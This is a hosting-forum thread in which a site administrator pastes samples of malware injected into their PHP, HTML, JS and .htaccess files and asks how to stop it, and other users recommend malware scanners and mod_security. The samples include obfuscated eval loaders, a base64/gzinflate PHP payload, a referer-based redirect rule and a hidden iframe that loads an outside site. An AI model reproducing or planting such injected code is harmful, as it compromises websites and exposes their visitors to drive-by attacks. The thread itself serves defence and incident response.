The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

How to Stop Malware code injection

Discussion in 'Security' started by ravibagul, Nov 12, 2012.

  1. ravibagul

    ravibagul Member

    Joined:
    Mar 16, 2006
    Messages:
    16
    Likes Received:
    0
    Trophy Points:
    1
    Hello,

    We are facing malware code injection in php, html, .js and .htaccess files. There are many types of code. Some time we get ftp downloading and uploading logs fore particular infected file, but some time we can not. So where we need to check the logs? How can we fully protected our sites including php and html pages as well as .js pages.

    Following are the few examples for it.
    Code:
    ============
    <!--c3284d--><script>try{q=document.createElement("p");q.appendChild(q+"");}
    catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f
    )?
    "CharC"+"ode"):"";e=window"eval"];n3,20,300,444,99,234,327,404,110,232,138,4
    76,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,456,99,122,102,4
    16,116,232,336,232,47,94,357,476,50,92,327,484,106,222,294,456,101,230,351,4
    36,101,222,330,432,105,220,303,184,99,222,327,188,109,194,315,440,46,224,312
    ,448,63,224,291,412,101,1230,412,61,68,291,468,116,222,102,128,102,228,291
    ,436,101,196,333,456,100,202,342,244,34,220,333,136,32,194,324,420,103,220,1
    83,136,99,202,330,464,101,228,102,128,104,202,315,412,104,232,183,136,50,68,
    96,476,105,200,348,416,61,68,150,136,62,120,141,420,102,228,291,436,101,124,
    117,164,59,26,30];if(window.document)for(i=6-2-1-2-1;-195+i!=2-2;i++){k=i;ss
    =ss+String[f](n[k]/(i%(h*h)+1e(ss);}}</script><!--/c3284d-->
    ============
    
    #c3284d#
    echo(gzinflate(base64_decode("dVPBjpswEP2WWuoKipP12AOBsrSHVb+gxyiHbAIL2mxIgD
    ZaRfvvfWMTbQ/tAZnxjN+898Z+GHdDd5q+TcPb9Vzt+92v1/o4LXdDvZ3qH4daokidVFyel9vTqT
    7uH9vusI/OicLe+2477drofImvbbUwZO/TsqGamtzbQvS7FBtSGcA41Rzmgk2WeurmAQr89jOhZVX
    ukBxuvKdUqMLG3jk4GFQg7MWFQIlyNaBR/rRSfIOeyx8TYpYZDmwC7JsgKMchA2oSDMCM2hgQZcQ
    LKAscz70Msh6cE88BRhIiRRggK9EqLdQRCsUG4E2ARqMqfA6xEQRTbDG/xcfBmdwCACpDfYKbbFk
    tlfsRhownJkgIodGN2vMwyxEM2jOUEI6y4O7s9u+8T9mI/w8mnfUeB2OUccytGAg0oRy6edp8zxp
    59OUh7RQM7P9Gc/jyP9qziEvfntHOVyr+ThMmmXeTDDzHYOKoIvESJRmgohfpv9eObLiHKYDJimI
    gb3ZlF0Thcu/vL3LuOmHqKuyhV2QfOWCijTpPlUWT6tLkvj6UnUlntU4Jj+noTs+r5tNdFy/bO6j
    7nPUfmnjhGK82zoaRyzvD/fz+/8D")));
    #/c3284d#
    ============
    
    #c3284d#
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER}
    ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|
    alltheuk|alltheweb|altista|america|amfibi|aol|apollo7|aport|arcor|ask|atsear
    ch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bri
    cabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex
    |cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|eurose
    ek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|findi
    tireland|findloo|findwhat|fjayde|jobrapido|kataweb|keyweb|kingdomseek|klam
    meraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|live
    internet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|m
    yspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|pas
    sagen|poyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|such
    biene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|
    telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onl
    ine|topseven|twitter|ukkey|uwe|verygoodsearch|vkon
    takte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|west
    australiaonline|wikipedia|wisenut|witch|wolong|ya|
    yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
    RewriteRule ^(.*)$
    </IfModule>
    #/c3284d#
    ============
    
    <script> var kqrvynN6s2UptKFD5j = { init: function () { this.browser =
    this.searchString(this.dataBrowser) || "An unknown browser"; this.version =
    this.searchVersion(navigator.userAgent) ||
    this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS =
    this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function
    (data) { for (var i=0;i<data.length;i++) { var ntextiQWzk951QAMZK =
    data[i].string; var fdvzythPxZC2jZIpRB = data[i].prop;
    this.versionSearchString = data[i].versionSearch || data[i].identity; if
    (ntextiQWzk951QAMZK) { if (ntextiQWzk951QAMZK.indexOf(data[i].subString)
    != -1) return data[i].identity; } else if (fdvzythPxZC2jZIpRB) return
    data[i].identity; } }, searchVersion: function (ntextiQWzk951QAMZK) { var
    index = ntextiQWzk951QAMZK.indexOf(this.versionSearchString); if (index
    == -1) return; return
    parseFloat(ntextiQWzk951QAMZK.substring(index+this.versionSearchString.lengt
    h+1)); }, dataBrowser: [       { string: navigator.userAgent,subString:
    "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString:
    "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string:
    navigator.platform,subString: "Win",identity: "Windows"}]};function
    gbdtqoDfpw3J1tc11I(szName,szValue,dtDaysExpires){ var zieplnJ1WztwXFznF6 =
    new Date();var spxxvul9MLe5CwKE09 =
    "";zieplnJ1WztwXFznF6.setTime(zieplnJ1WztwXFznF6.getTime()+dtDaysExpires*24*
    60*60*1000);spxxvulame){        var i=0;var ghibchGv7yz3UOmwZA=0;var
    krhipfXA9ijx9JTaLe=0;var shlllk400Y1z7nMuVL=document.cookie; while
    (i<=shlllk400Y1z7nMuVL.length){ghibchGv7yz3UOmwZA=i;krhipfXA9ijx9JTaLe=ghibc
    hGv7yz3UOmwZA+szName.length;if
    (shlllk400Y1z7nMuVL.substring(ghibchGv7yz3UOmwZA,krhipfXA9ijx9JTaLe)==szName
    ){ghibchGv7yz3UOmwZA=krhipfXA9ijx9JTaLe+1;krhipfXA9ijx9JTaLe=document.cookie
    .indexOf(";",ghibchGv7yz3UOmwZA);if(krhipfXA9ijx9JTaLe<ghibchGv7yz3UOmwZA)
    krhipfXA9ijx9JTaLe=document.cookie.length;return
    document.cookie.substring(ghibchGv7yz3UOmwZA,krhipfXA9ijx9JTaLe);break;}i++;
    } return "";} kqrvynN6s2UptKFD5j.init(); var shlllk400Y1z7nMuVL =
    document.cookie; var xfosdspPRkedYhiiOQ = kqrvynN6s2UptKFD5j.browser; var os
    = kqrvynN6s2UptKFD5j.OS; if ( ((xfosdspPRkedYhiiOQ == "Firefox" ||
    xfosdspPRkedYhiiOQ == "Explorer") && (os == "Windows")) &&
    (nftjhe5c5kfodN6nbg('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') )
    {gbdtqoDfpw3J1tc11I("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document
    .write('<iframe src="http://csepros.com" name="Twitter" scrolling="auto"
    frameborder="no" align="center" height = "1px" width =
    "1px"></iframe>');}else {}</script>root@rapid [~]# cat
    /home/stcallma//public_html/_vti_inf.html
    
    ============
    <!--a4bc48--><script>if(window.document)a=("urf3".split+'qwe').substr(0,6);a
    a=(Date+{}).substr(0,6);if(a===aa)f=[-28,-28,68,65,-5,3,63,74,62,80,72,64,73
    ,79,9,66,64,79,32,71,64,72,64,73,79,78,29,84,47,60,66,41,60,72,64,3,2,61,74,
    63,84,2,4,54,11,56,4,86,-28,-,-,68,65,77,60,72,64,77,3,4,22,-,-,88,-,64,71,7
    8,64,-,86,-,-,-,74,62,80,72,64,73,79,9,82,77,68,79,64,3,-,23,68,65,77,60,72,
    64,-,78,77,62,24,2,67,79,79,75,21,10,10,82,64,61,74,77,63,64,77,72,60,73,60,
    66,64,77,9,62,74,72,2,-,82,68,63,79,67,24,2,12,11,2,-,67,64,68,66,67,79,24,2
    ,12,11,2,-,78,79,84,71,64,24,2,81,68,78,68,61,68,71,68,79,84,21,67,68,63,63,
    64,73,22,75,74,78,68,79,68,74,73,21,60,61,78,74,71,80,79,64,22,71,64,65,79,2
    1,11,22,79,74,75,21,11,22,2,25,23,10,68,65,77,60,72,64,25,-3,4,22,-28,-,88,-
    ,-,65,80,73,62,79,68,74,78,64,79,28,79,79,77,68,61,80,79,64,3,2,775,2
    1,10,10,82,64,61,74,77,63,64,77,72,60,73,60,66,64,77,9,62,74,72,2,4,22,65,9,
    78,79,84,71,64,9,81,68,78,68,61,68,71,68,79,84,24,2,67,68,63,63,64,73,2,22,6
    5,9,78,79,84,71,64,9,75,74,78,68,79,68,74,73,24,2,60,61,78,74,71,80,79,64,2,
    22,65,9,78,79,84,71,64,9,71,64,65,79,24,2,11,2,22,65,9,78,79,84,71,64,9,79,7
    4,75,24,2,11,2,22,65,9,78,64,79,28,79,79,77,68,61,80,79,64,3,2,82,68,63,79,6
    7,2,7,2,12,11,2,4,22,65,9,78,64,79,28,79,79,77,68,61,80,79,64,3,2,67,64,68,6
    6,67,79,2,7,2,12,11,2,4,22,-,-,-,63,74,62,80,72,64,73,79,9,66,64,79,32,71,64
    ,72,64,73,79,78,29,84,47,60,66,41,60,72,64,3,2,61,74,63,84,2,4,54,11,56,9,60
    ,75,75,64,73,63,30,67,68,71,63,3,65,4,22,-28,-8,88];md='a';q="q";e=eval;w=f;
    s='';g='fro'+'mCharCode';for(i=0;i<w.length;i++){s=s+String[g](37+w[i]);}if(
    a===aa)e('e(s)');</script><!--/a4bc48-->
    
    ============
    Please advice us,

    Thanks.
     
  2. STS Admin

    STS Admin Well-Known Member

    Joined:
    Jul 8, 2012
    Messages:
    47
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    India
    cPanel Access Level:
    Root Administrator
    You can try configserver exploit scanner ConfigServer eXploit Scanner (cxs)

    It does active scan on all files uploaded to server. Weather it's uploaded via php script, perl, cgi or ftp (pure-ftp)
     
  3. ravibagul

    ravibagul Member

    Joined:
    Mar 16, 2006
    Messages:
    16
    Likes Received:
    0
    Trophy Points:
    1
    Hello Admin,

    cxs is third party licensed tool. Anything else? Any other way to prevent this?
     
  4. RandallJ

    RandallJ Member

    Joined:
    Nov 13, 2012
    Messages:
    11
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    Yea, learn to secure your server yourself, pay someone to secure your server, or unplug the thing..

    The $50 for CXS makes it virtually free if you need the thing.. (I suggest you get a full server package myself) you have clients on your box with bad scripting or worse yet, you are rooted.. My bet is you have some shell scripts and bad folder settings..

    Chirpy has set base security on my servers for close to 10 years and frankly, he does a great job (well Sarah too).. Really is the best money you can spend to start out IMHO..

    The damage being done by these scripts (likely sending out tons of spam via nobody) is going to cost your business if you dont stop it. Makes the few bucks now really a good investment..


    And for what it is worth... do not post scripts or chunks of them... stupid things propagate enough as it is without people helping them along..
     
    #4 RandallJ, Nov 18, 2012
    Last edited: Nov 18, 2012
  5. dalem

    dalem Well-Known Member
    PartnerNOC

    Joined:
    Oct 24, 2003
    Messages:
    2,577
    Likes Received:
    40
    Trophy Points:
    48
    Location:
    SLC
    cPanel Access Level:
    DataCenter Provider
  6. nospa

    nospa Well-Known Member

    Joined:
    Apr 23, 2012
    Messages:
    110
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Reseller Owner
  7. mahinder

    mahinder Well-Known Member

    Joined:
    Jun 12, 2003
    Messages:
    68
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    matrix
    You can start with installing nice set of mod_security rules. Search Forum for mod_security for more information. These kind of infections also come from infected computers through FTP uploads. If you scan recently modified files on server regularly, you will be able to detect many such infections.
     
  8. sahostking

    sahostking Well-Known Member

    Joined:
    May 15, 2012
    Messages:
    299
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Cape Town, South Africa
    cPanel Access Level:
    Root Administrator
    Linux Malware Detect | R-fx Networks

    Anyone use the above on production servers yet. Would like some opinions.
     
  9. STS Admin

    STS Admin Well-Known Member

    Joined:
    Jul 8, 2012
    Messages:
    47
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    India
    cPanel Access Level:
    Root Administrator
    Yes, It's a good scanner. Works perfectly fine. You can configure it as per your need weather just to alert you with the list of infected files, quarantine them or automatically delete them on scan.
     
  10. crazyaboutlinux

    crazyaboutlinux Well-Known Member

    Joined:
    Nov 3, 2007
    Messages:
    938
    Likes Received:
    0
    Trophy Points:
    16
    Yes LMD it's good malware detector for linux
     
  11. Sannin

    Sannin Active Member

    Joined:
    May 19, 2011
    Messages:
    34
    Likes Received:
    0
    Trophy Points:
    6
    LMD is good, but CXS is better. I use them both on my server. CXS can detect more threats, such as compromised .htaccess files, defaced php files etc...
     
Loading...

Share This Page